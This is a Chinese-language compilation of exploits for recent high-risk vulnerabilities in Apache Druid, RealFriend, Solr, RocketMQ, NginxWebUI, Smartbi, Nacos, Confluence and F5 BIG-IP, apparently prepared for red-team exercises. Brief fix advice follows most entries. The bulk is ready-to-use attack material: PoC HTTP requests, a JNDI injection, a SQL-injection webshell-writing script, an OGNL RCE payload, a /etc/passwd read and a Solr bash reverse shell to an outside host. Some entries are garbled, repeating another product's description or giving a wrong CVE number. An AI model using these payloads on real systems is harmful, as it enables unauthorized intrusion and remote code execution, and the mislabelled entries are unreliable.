HW在即，你需要的40个高危漏洞利用与修复整合（二）

Apache Druid 远程代码执行漏洞

该漏洞源于 Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194)，Apache Druid 由于支持从 Kafka 加载数据，刚好满足其利用条件，攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击，进而在服务端执行任意恶意代码。 漏洞标签：服务器权限相关、数据库权限相关、涉及重点系统 漏洞编号：QVD-2023-9629 漏洞类型：RCE 受影响版本：

1. Apache Druid <= 25.0.0

利用方法

poc

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close
​
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"1.1.1.1:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
​
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}

user.provider.url处填写你的恶意ldap服务url

修复建议

1. 避免 Apache Druid 开放至公网。
2. 开启身份认证机制,可参考官方文档：https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html

瑞友天翼应用虚拟化系统远程代码执行漏洞

瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台，它将用户各种应用软件集中部署到瑞友天翼服务集群，客户端通过 WEB 即可访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等。未经身份认证的远程攻击者可以利用系统中存在的 SQL 注入漏洞，写入后门文件，从而执行远程代码。 漏洞标签：服务器权限相关、利用链成熟、涉及重点系统 漏洞编号：无 漏洞类型：RCE 受影响版本：

1. 5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.3.1

利用方法

poc

import requests
import sys
​
url = sys.argv[1]
payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"
repose = requests.get(url=url+payload)
if repose.status_code ==200:
    a = url + '1.php'
    b = requests.get(url=a)
    if b.status_code == 200:
        print('[+] 漏洞存在，验证地址: {}1.php '.format(url))

payload

GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1

修复建议

1. 避免将该系统开放至公网。
2. 官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，建议您在升级前做好数据备份工作，避免出现意外，酌情升级至安全版本：http://soft.realor.cn:88/Gwt7.0.4.1.exe

Apache Superset 身份认证绕过漏洞

这个漏洞是由于默认配置的 SECRET_KEY 不安全所导致的。如果管理员没有根据安装说明更改默认配置的 SECRET_KEY，则攻击者可以通过身份验证并访问未经授权的资源或执行恶意代码。 漏洞标签：利用链成熟 漏洞编号：CVE-2023-27524 漏洞类型：认证绕过 受影响版本：

1. Apache Superset <= 2.0.1

利用方法

漏洞利用工具 ：https://github.com/horizon3ai/CVE-2023-27524

修复建议

1. 修改默认的 SECRET_KEY,参考官方文档:https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation
2. 官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本。https://downloads.apache.org/superset/

Apache Solr 代码执行漏洞

Solr 以 Solrcloud 模式启动且可出网时，未经身份验证的远程攻击者可以通过发送特制的数据包进行利用，最终在目标系统上远程执行任意代码。 漏洞标签：利用链成熟、涉及重点系统、服务器权限相关 漏洞编号：CNVD-2023-27598 漏洞类型：RCE 受影响版本：

1. 8.10.0 <= Apache Solr < 9.2.0

利用方法

使用postCommit来命令执行

POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 180
Content-Type: application/json
​
{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.1.92/6666 0>&1"]}}

** **通过newSearcher命令执行

POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 170
Content-Type: application/json
​
{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 x9hr3z.dnslog.cn"]}}

修复建议

如果未使用 ConfigSets API，请禁用 UPLOAD 命令，将系统属性： configset.upload.enabled 设置为 false ，详细参考： https://lucene.apache.org/solr/guide/8_6/configsets-api.html 使用身份验证/授权，详细参考：https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plu gins.html 官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本： https://github.com/apache/solr/releases/tag/releases/solr/9.2.0

Apache RocketMQ 远程代码执行漏洞

RocketMQ 5.1.0 及以下版本在一定条件下存在远程命令执行风险。RocketMQ的 NameServer、Broker、Controller 等多个组件暴露在外网且缺乏权限验证，攻击者可以利用此缺陷通过「更新配置」功能修改配置路径，进而以系统用户身份执行任意命令（伪造 RocketMQ 协议也可执行任意命令）。 漏洞标签：利用链成熟、涉及重点系统、服务器权限相关、影响范围广 漏洞编号：CVE-2023-33246 漏洞类型：RCE 受影响版本：

1. 5.0.0 <= Apache RocketMQ <= 5.1.0
2. 4.0.0 <= Apache RocketMQ <= 4.9.5

利用方法

exp https://github.com/SuperZero/CVE-2023-33246 使用方法

java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "注入的命令"

修复建议

1. RocketMQ 的 NameServer、Broker、Controller 组件非必要不暴露在公网。同时，建议增加访问权限认证。
2. 官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本：https://rocketmq.apache.org/download

NginxWebUI runCmd 远程代码执行漏洞

该漏洞源于开发人员没有对 runCmd 接口处传入的参数进行有效过滤，攻击者可在无需登录的情况下绕过路由权限校验，通过拼接语句的方式执行任意命令，最终控制服务器。 漏洞标签：利用链成熟、历史重大漏洞、服务器权限相关、影响范围广 漏洞编号：CVE-2023-33246 漏洞类型：RCE 受影响版本：

1. nginxWebUI < 3.5.1（v3.5.1 版本修复了登陆绕过漏洞，但是 RCE 漏洞在最新版本（v3.6.5）中仍可绕过防护进行利用）

利用方法

poc

GET /AdminPage/conf/runCmd?cmd=执行的命令%26%26echo%20nginx HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

检测工具 https://github.com/chaitin/xpoc

修复建议

1. 通过设置安全组功能，仅对可信地址和内网开放 nginxWebUI 来缓解风险。
2. 官方已发布漏洞补丁及修复版本，但组件修复不完全，防护机制可被绕过，且其他接口仍存在多个高危漏洞。因此建议受漏洞影响的用户及时关注厂商公告并及时更新 NginxWebUI：http://file.nginxwebui.cn/nginxWebUI-3.6.5.jar

Smartbi 商业智能软件绕过登录漏洞

该漏洞源于 Smartbi 默认存在内置用户，在使用特定接口时，攻击者可绕过用户身份认证机制获取内置用户身份凭证，随后可使用获取的身份凭证调用后台接口，最终可能导致敏感信息泄露和代码执行。 漏洞标签：利用链成熟、国产系统、影响范围广 漏洞编号：无 漏洞类型：认证绕过 受影响版本：

1. V7 <= Smartbi <=V10

利用方法

验证漏洞是否存在

http://your-ip/smartbi/vision/RMIServlet

出现以下回显证明漏洞存在

{"retCode":"CLIENT_USER_NOT_LOGIN","result":"尚未登录或会话过期"}

poc

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
 
className=UserService&methodName=loginFromDB¶ms=["system","0a"]

修复建议

官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本： https://www.smartbi.com.cn/patchinfo

Nacos 集群 Raft 反序列化漏洞

该漏洞源于 Nacos 集群处理部分 Jraft 请求时，未限制使用 hessian 进行反 。序列化，攻击者可以通过发送特制的请求触发该漏洞，最终执行任意远程代码。 该漏洞源于 Smartbi 默认存在内置用户，在使用特定接口时，攻击者可绕过用户身份认证机制获取内置用户身份凭证，随后可使用获取的身份凭证调用后台接口，最终可能导致敏感信息泄露和代码执行。 漏洞标签：利用链成熟、国产框架、影响范围广、服务器权限相关 漏洞编号：CNVD-2023-45001 漏洞类型：RCE 受影响版本：

1. 1.4.0 <= Nacos < 1.4.6
2. 2.0.0 <= Nacos < 2.2.3

利用方法

exp https://github.com/c0olw/NacosRce/

修复建议

1. 默认配置下该漏洞仅影响 Nacos 集群间 Raft 协议通信的 7848 端口，此端口不承载客户端请求，可以通过限制集群外部 IP 访问 7848 端口来进行缓解。
2. 官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本： https://github.com/alibaba/nacos/releases

Atlassian Confluence OGNL 表达式注入漏洞

在 Atlassian Confluence Server and Data Center 上存在 OGNL 注入漏洞， 恶意攻击者可以利用该漏洞发送特制请求从而在目标服务器上注入恶意 OGNL 表达式，造成远程执行代码并部署 WebShell。 漏洞标签：利用链成熟、历史重大漏洞、涉及重点系统 漏洞编号：CVE-2022-26134 漏洞类型：RCE 受影响版本：

1. Atlassian Confluence Server and Data Center >= 1.3.0
2. Atlassian Confluence Server and Data Center < 7.4.17
3. Atlassian Confluence Server and Data Center < 7.13.7
4. Atlassian Confluence Server and Data Center < 7.14.3
5. Atlassian Confluence Server and Data Center < 7.15.2
6. Atlassian Confluence Server and Data Center < 7.16.4
7. Atlassian Confluence Server and Data Center < 7.17.4
8. Atlassian Confluence Server and Data Center < 7.18.1

利用方法

poc

GET //%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: XX.XX.XX.XX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3764D915B037D5A50D8025AA793E990A
Connection: close

github利用脚本： https://github.com/Nwqda/CVE-2022-26134

修复建议

1. 升级 Atlassian Confluence Server and Data Center 至安全版本。
2. 临时缓解方案：下载官方发布的 xwork-1.0.3-atlassian-10.jar 替换 confluence/WEB-INF/lib/目录下原来的 xwork jar 文件，并重启 Confluence。https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

F5 BIG-IP iControl REST 身份验证绕过漏洞

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞，攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 漏洞标签：利用链成熟、历史重大漏洞、影响范围广 漏洞编号：CVE-2022-1388 漏洞类型：认证绕过 受影响版本：

1. 16.1.0<=F5 BIG-IP<=16.1.2
2. 15.1.0<=F5 BIG-IP<=15.1.5
3. 14.1.0<=F5 BIG-IP<=14.1.4
4. 13.1.0<=F5 BIG-IP<=13.1.4
5. 12.1.0<=F5 BIG-IP<=12.1.6
6. 11.6.1<=F5 BIG-IP<=11.6.5

利用方法

poc

文件读取 https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

检测脚本 https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh 使用方法

./CVE-2022-1388.sh hosts.txt

修复建议

1. 建议升级至最新版本或可参考官方修复建议 Recommended Actions：https://support.f5.com/csp/article/K23605346
2. 在受影响的版本内可执行以下步骤以缓解攻击：

1.通过自身 IP 地址阻止 iControl REST 访问。 \2. 通过管理界面阻止 iControl REST 访问。 \3. 修改 BIG-IP httpd 配置。